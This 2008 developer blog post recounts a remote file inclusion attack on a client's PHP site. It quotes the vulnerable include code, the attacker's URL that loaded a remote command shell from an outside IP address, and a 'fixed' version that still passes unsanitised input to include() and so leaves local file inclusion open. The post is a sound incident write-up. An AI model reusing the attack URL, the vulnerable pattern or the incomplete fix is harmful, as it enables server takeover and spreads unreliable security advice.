<img src="http://joncrawford.com/system/images/php.gif" class="photoleft" style="background:0;" /> A panicked client of mine contacted me today with concerns about his website. Every few times we would load his company's homepage, it would show an incorrect website. This site had links to p0rn and other subject matter that a fine business would deem unfit to put on the front page of its website. <a href="http://skitch.com/newmonarch/j254/not-the-correct-website" target="_blank">See the page that was being maliciously loaded here</a>. So I got to work hunting down the source of the hijack. =more= With some help from the gurus at "HostGator":http://hostgator.com support, I finally found out how this was happening. The answer: RFI ("Remote File Inclusion") Attack. Most of our small websites we do in PHP. I pass off all of my PHP work to my code monkeys these days. The benefits and sanity that come from Ruby on Rails make it almost impossible for me to even look at PHP without feeling dizzy. The developer for this site unwittingly used a small piece of vulnerable code that basically allowed any hacker to make the website his own personal playground. h3. Vulnerable Code <notextile> <pre lang="php"> #example http://bellchem.com/products.php?page=tech #example http://bellchem.com/products.php?page=nutrition $page = $_GET['page']; include $page . ".php"; </pre> </notextile> What a lot of PHP developers don't know is that the <code>include()</code> function will actually allow you to include even a remote file. So one could write <code>include('http://apple.com'); </code>, for instance, and insert the code from Apple's website into the body of their own site. And to take it even one step further, the function doesn't just include remote content. It also *EXECUTES* the included code. This means that with a hole like this in your code, a hacker could write any PHP script they wanted to and then just include it in your URL and *_your web server will run it!_* And that's exactly what our hacker did. h3. Malicious URL Used By Hacker <pre>http://website.com/products.php?page=http://141.84.238.34/.../cmd?</pre> Upon including "http://141.84.238.34/.../cmd?" at the end of url, it loaded up a simple yet impressive file management panel right in the middle of my beautiful website. <a href="http://skitch.com/newmonarch/j255/malicious-upload-form-exploit" target="_blank">Take a look</a>. It's really quite impressive. As you can see, from here the attacker can completely manipulate the entire filesystem and even execute shell commands on the server. This attacker used this opportunity to redirect to a site of which he or she must've had some interest in the advertising revenue. Well, the password has been changed and the vulnerability has been closed. I'm sure there is more than one way to secure this hole, but here is how I did it. h3. Cleaned Up Version <span class="quiet small">Won't execute remote code</span> <notextile> <pre lang="php"> $page = $_GET['page']; # Checks to see if file even exists locally before loading it. if (file_exists("./$page.php")) include $page.".php"; else echo "There has been a problem."; </pre> </notextile> <span class="small quiet">The full dish: "RFI Attack on Wikipedia":http://en.wikipedia.org/wiki/Remote_File_Inclusion</span> 0 false 2008-04-17T22:20:13-07:00 article false 6 false nasty-php-exploit-rears-its-ugly-head-rfi-attack true 2008-04-17T23:50:29-07:00 2009-12-15T11:38:51-08:00